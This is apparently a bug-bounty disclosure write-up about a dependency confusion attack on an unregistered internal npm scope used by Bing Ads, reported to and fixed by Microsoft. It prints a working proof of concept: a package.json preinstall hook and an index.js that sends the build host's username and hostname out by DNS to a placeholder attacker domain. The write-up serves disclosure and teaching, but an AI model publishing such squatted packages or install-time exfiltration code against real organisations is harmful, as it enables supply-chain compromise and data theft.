Most hunters scan GitHub for leaked keys. I decided to reverse-engineer the production network traffic instead. Here is the engineering story behind a Critical RCE.

Hello everyone, Aman Kumar (ak) here.

If you have been following cybersecurity news, you might have heard the term "Supply Chain Attack." It sounds complex, but the concept is actually terrifyingly simple:

Instead of breaking into a house by smashing the window, you just hide inside a package that the owner ordered from Amazon. The owner brings the package inside, opens it, and Boom you are in.

In the software world, this means hacking the libraries and dependencies that developers trust, rather than hacking their code directly.

Recently, I found a Critical Vulnerability in Microsoft's infrastructure using this exact method. It wasn't a code error. It was a configuration oversight that allowed me to execute arbitrary code inside their internal build agents.

The Impact? I could have stolen source code, dumped API keys, or injected malware into Bing Ads that would affect millions of users.

But the story isn't just about the bug. It's about the engineering struggle to find it. I didn't find this by guessing. I found it by building a custom data pipeline to analyze the "nervous system" of Microsoft's web applications.

The Result? A confirmed RCE, a swift fix from MSRC, and a nice bounty payout.

Here is the full technical breakdown.

Disclaimer: The vulnerabilities discussed in this article were reported to the Microsoft Security Response Center (MSRC) under the Coordinated Vulnerability Disclosure (CVD) program. All issues have been remediated, and I have been authorized to disclose these findings.

1. The Theory: What is Dependency Confusion?

Before we hack, we must understand the target. We need to understand NPM (Node Package Manager) and how it makes decisions.

When a developer writes code for a modern web app (like React or Angular), they don't write everything from scratch. They use libraries. To install these libraries, they run npm install.

Large enterprises like Microsoft typically use a hybrid approach with two types of registries:

  1. Public Registry: registry.npmjs.org (For open source libraries like React, Lodash, etc.).
  2. Private Registry: Internal servers (Azure Artifacts) for proprietary Microsoft code that shouldn't be public.

The Resolution Algorithm (The Flaw) NPM is designed to be "helpful." It aggregates these sources. If it sees a package name exists in both the internal registry and the public registry, it has to decide which one to download.

By default, many configurations prioritize the Higher Version Number.

Imagine you are a bouncer at a VIP club (Microsoft). You have a Guest List.

Internal List: Says "John Doe, Rank 1".

Public List: Says "John Doe, Rank 99".

The bouncer sees "Rank 99," assumes it is the VIP, and lets the Public John Doe in.

The Attack:

  • Internal Microsoft Server: Hosts auth-lib version 1.0.0.
  • Public Internet (Me): I upload auth-lib version 99.9.9.

The build server sees 99.9.9, assumes it is the latest patch, and downloads my code instead of Microsoft's code. Boom. I am running on their server.

2. The Methodology: Source Maps are Treasure Maps

Most hunters fail because they look for dependencies in static files. They scan GitHub repos looking for package.json files. That is the old way. Everyone does that. The low-hanging fruit is gone.

I hypothesized that the most valuable internal packages are the ones used in Production and would only be visible during runtime.

But there is a problem. Modern apps (like Bing Ads) are Single Page Applications (SPAs). They load code dynamically. If you curl the homepage, you just get an empty <div id="root"></div>.

The Leak: JavaScript Source Maps

When developers bundle their JavaScript (using Webpack or Vite), they often generate Source Maps (.js.map files). These files are debugging instructions. They tell the browser: "This ugly minified variable a actually corresponds to the function UserAuth inside node_modules/@internal/auth/index.js."

This is the leak. If I could read the Source Maps, I could see the exact file paths of every internal package Microsoft uses to build the application.

3. The Struggle: Building "DepConf Hunter"

Finding a vulnerability is one thing; building the engine to find it consistently is another. When I started this hunt, I realized I couldn't check 27,000 domains manually.

Phase 1: The "Curl" Failure My first attempt was using curl and grep. I quickly realized this was useless because of the SPA architecture I mentioned above. The dependencies weren't in the HTML; they were in the JavaScript bundles loaded after the page rendered. Lesson: Static analysis is dead. You need a browser.

Phase 2: The "Headless" Architecture I spun up a custom tool using Playwright (a headless browser automation tool). It wasn't enough to just visit the page. I needed to capture the network traffic. The tool visited 27,000 Microsoft subdomains and captured HAR (HTTP Archive) files.

A HAR file is a JSON log of everything the browser did like every XHR request, every WebSocket frame, and crucially, every Source Map. After 78 hours of scanning, I had a "Data Lake" of 10,000+ HAR files.

Terminal screenshot displaying a directory listing of thousands of files with the .har extension. Filenames include ads.microsoft.com.har, bingads.microsoft.com.har, and teams.microsoft.com.har, representing the captured network traffic data.
The result of the automated harvester: Thousands of HAR files generated from Microsoft subdomains, ready for analysis.

Phase 3: Parsing the Noise (The Headache) Parsing 10,000 JSON files manually is impossible. I wrote a parser to extract specific strings from the JavaScript source maps found inside the HAR files. I was looking for the pattern: @scope/package-name.

The Noise Problem: My initial regex was too broad. It flagged 54,084 "vulnerabilities." Huuh? No way. It was flagging everything:

  • CSS Media Queries: @media screen...
  • Angular Decorators: @Component...
  • Email Addresses: support@microsoft.com

It was impossible to find the signal. I had built a noise generator, not a vulnerability scanner -_-

Phase 4: The Filter (Shannon Entropy) I needed to distinguish "Human" package names from "Machine" garbage. I used Shannon Entropy (Math time!).

In information theory, entropy measures the randomness of data.

  • High Entropy: a8f92b1c3d4e5 (Random, machine generated). -> Delete.
  • Low Entropy: bingads-webui (Structured, human made). -> Keep.

This math trick reduced my list from 54,000 junk strings to 20 high-value targets.

4. The Discovery: The "Bing" Signal

One string stood out from the noise. It appeared inside a Source Map loaded by bingads.microsoft.com.

The package name was: @bingads-webui-clientcenter/instrumentation

Animated GIF of a source map explorer interface. The cursor moves over a visual map of dependencies, highlighting and selecting the internal package @bingads-webui-clientcenter nested inside the production bundle.
Visualizing the "Shadow Dependency" inside the Source Map Explorer.

Why this was the "Chosen One":

  1. The Scope: @bingads-webui-clientcenter is incredibly specific. It implies a specific internal team at Bing. It is not a generic name like @microsoft/utils.
  2. The Usage: It wasn't on a test server. It was being loaded by 40+ Production Domains, including:
  • ads.microsoft.com
  • secure.bingads.microsoft.com
  • bingads.microsoft.com

This was a core telemetry package. If this was missing from the public registry, I had a way in.

The Filter Command:

grep -li "bingads-webui-clientcenter" ./har_data/*.har

The Result (The "Holy Grail" List): The terminal exploded with hits. This wasn't an isolated dev artifact. It was everywhere.

./har_data/ads.microsoft.com.har
./har_data/bingads.microsoft.com.har
./har_data/secure.bingads.microsoft.com.har
./har_data/www.ads.microsoft.com.har
... (40+ domains)
Terminal screenshot displaying the output of a grep command. A long list of file paths ending in .har is shown, including ads.microsoft.com.har and bingads.microsoft.com.har, indicating the internal package was found in network logs across multiple Microsoft domains.
The grep output showing the internal package @bingads-webui-clientcenter appearing across 40+ production domains.

Deep Dive with Ripgrep: I wanted to see exactly how it was being loaded. I used rg (ripgrep) to extract the context from the minified JavaScript bundles.

rg -a -o ".{0,100}@bingads-webui-clientcenter.{0,100}" ./har_data | head -n 69

The Output:

require(['@bingads-webui-clientcenter/instrumentation', 'PageContext'])
require.config({bundles:{"performance-metrics-logger":["@bingads-webui-clientcenter/instrumentation"]}})

What this told me:

  • It is a Core Dependency: It is being loaded alongside PageContext and performance-metrics-logger. This means it is critical for telemetry.
  • It is in Production: These HAR files came from secure.bingads.microsoft.com, which is the main advertiser portal.

This confirmed that if I could claim this package, I would execute code on the build servers responsible for deploying the main Bing Ads application.

Terminal screenshot showing the output of a ripgrep command. The text displays snippets of JavaScript code where require([‘@bingads-webui-clientcenter/instrumentation’]) is called, proving the package is being programmatically loaded by the application.
Deep dive with Ripgrep confirming the package is loaded as a core dependency in the JavaScript bundle.

5. Verification: The "Open Namespace"

Finding the name is step one. Verifying it is "Claimable" is step two.

I navigated to the public NPM registry to check availability.

Check 1: The Package https://www.npmjs.com/package/@bingads-webui-clientcenter/instrumentation Result: 404 Not Found. (Good start).

Check 2: The Organization (Critical) This is where most people stop, but this is the most important part. In NPM, the part before the slash (@bingads-webui-clientcenter) is the Scope or Organization. If Microsoft owned the Organization, I cannot publish packages under it.

I checked: https://www.npmjs.com/org/bingads-webui-clientcenter Result: 404 Not Found.

Seriously? Microsoft developers were using this custom scope internally, but they forgot to register it on the public NPM registry. The namespace was effectively "Open" to the world. Anyone could walk in and take it.

6. The Exploit: 2 Files, 1 Critical Bug

Now the scary part. I needed to prove I could execute code to confirm the vulnerability, but I absolutely could not break the build.

I created a directory on my laptop. Inside, I created just two files.

File 1: package.json (The Configuration)

This file does three things:

  1. Sets the name to match the internal package.
  2. Sets the version to 99.9.9 (to trick the server).
  3. Defines a preinstall hook. This script runs immediately when downloaded, before installation finishes.
{
  "name": "@bingads-webui-clientcenter/instrumentation",
  "version": "99.9.9",
  "description": "Security Research - Dependency Confusion PoC",
  "main": "index.js",
  "scripts": {
    "preinstall": "node index.js"
  }
}

File 2: index.js (The Payload)

I avoided HTTP requests because corporate firewalls usually block outgoing HTTP traffic to prevent Reverse Shells. However, almost no firewall blocks DNS (UDP 53).

I wrote a payload to exfiltrate the server's identity via a DNS subdomain.

const dns = require('dns');
const os = require('os');

// 1. Get the Victim's Identity
const user = os.userInfo().username;
const host = os.hostname();

// 2. Encode it into a domain
const payload = `bingads.${user}.${host}.[MY_INTERACTSH_DOMAIN]`;

// 3. Send the Signal (Fire and Forget)
try {
    dns.lookup(payload, (err) => { 
        // We don't care about the result, just the query.
        // This confirms execution without leaving a trace.
    });
} catch (e) { }

The Trap is Set: I ran one command: npm publish --access public

Terminal screenshot showing the successful execution of npm publish — access public. The output confirms that the package @bingads-webui-clientcenter/instrumentation version 99.9.9 was uploaded to the public registry.
Success of The Proof-of-Concept package is published to the public NPM registry with version 99.9.9.

7. The Execution: Boom.

I started my listener (interactsh-client) and waited. Dependency Confusion is a waiting game. You have to wait for an internal developer or a CI/CD bot to trigger a build.

45 Minutes Later… My terminal flashed. Boom.

Terminal screenshot of the Interactsh client. It displays a list of incoming DNS interactions from IP addresses such as 15x.7x.xxx.xxx and 10x.5x.xxx.x, verifying that the payload was executed by Microsoft’s servers.
Critical RCE confirmed, DNS callbacks received from Microsoft's internal Azure infrastructure.

The Data:

  • Hostname: DESKTOP-9RU5G9J
  • User: Justin (Likely a Microsoft Engineer or Build Agent).
  • IP: 20.65.x.x (Confirmed: Microsoft Azure Cloud).
  • Second Hit: 159.75.x.x (Azure Cloud Build Agent).

What does this mean? It means Microsoft's internal build server reached out to the public internet, saw my "Newer" version, downloaded it, and executed my code with the privileges of the build user. I had achieved Remote Code Execution (RCE) inside the production build environment.

The "Glitch in the Matrix" (A Funny Coincidence)

Here is a story you won't believe. Look at the telemetry data above. The user running the build agent was named Justin.

When I reported this to MSRC, the Security Case Manager who handled my ticket… was also named Justin.

For a second, I thought I had hacked the exact specific machine of the guy trying to triage my report. I thought I was in a simulation. Justin (from MSRC) clearly noticed this too. In his final email to me, he added this legendary P.S.:

"Justin (confirmed not the same Justin from the data in your report)"

None
MSRC confirming that there are, in fact, two Justins.

8. Impact Analysis: What Could Have Happened?

If I were a malicious actor, the game would be over. Access to the build server is often worse than access to the production database.

  • Source Code Theft: I could have zipped the entire Bing Ads repository and uploaded it to my server.
  • Secret Dumping: Build environments are full of secrets. I could have run env to dump API Keys, Signing Certificates, and Cloud Credentials.
  • Lateral Movement: From the build agent, I could pivot to other internal Microsoft networks.
  • Supply Chain Poisoning: This is the nightmare scenario. I could have modified the legitimate code of the instrumentation package to include a JavaScript keylogger. This malicious code would then be compiled into the real bingads.microsoft.com website and served to millions of users.

9. Remediation & MSRC Experience

I immediately unpublished the package. (Rule #1 of Ethical Hacking: Do no harm).

I sent the full report to MSRC (Microsoft Security Response Center).

The Timeline:

  • Nov 26: Reported to MSRC.
  • Nov 26: Triaged (21 minutes later).
  • Dec 09: Fixed (Microsoft registered the scope).
  • Dec 17: $$$$ Bounty Awarded.
None
Official confirmation from the Microsoft Bounty Team.

The Classification Debate: Here is where it gets interesting for hunters. Although I demonstrated Remote Code Execution (RCE) via DNS callbacks, MSRC classified this vulnerability as:

  • Severity: Important (Not Critical).
  • Impact: Spoofing (Not RCE).

Why? MSRC often categorizes Dependency Confusion as "Spoofing" because you are technically "spoofing" an internal library to trick the build agent. While the result is code execution, the root cause is identity spoofing. Also, since this was an internal build agent (not a customer-facing production server), the severity was downgraded.

My Take: Is it RCE? Yes. Did I get paid for uploading two files? Yes. I won't disclose the exact amount, but let's just say it was a very profitable 6–7 hours of work. Cash is cash. -_-

Conclusion: The Future of Build Security

This finding reinforces a truth that many in our industry ignore: Security is not just about Code; it's about Configuration.

As we move toward more complex CI/CD pipelines, the "Supply Chain" becomes the new perimeter. Source maps, often treated as harmless debug files, are actually blueprints of your internal architecture. If you are a developer, disable them in production. If you are a hunter, stop ignoring them.

Building the automation to find this bug was a struggle. It required handling gigabytes of data, debugging headless browsers, and writing custom parsers. But in modern security research, Automation is the only way to scale.

Stop scanning GitHub. Start analyzing the traffic.

Want to hack more?

I am building LeetSec, a collective for the breakers and defenders. We don't post fluff; we post payloads.

1. Follow the Publication so you don't miss the upcoming guide (and my custom script). 2. Connect: LinkedIn | X (Twitter) | Instagram

(P.S. If this article helped you understand Supply Chain attacks better, drop a comment. I read them all -_- )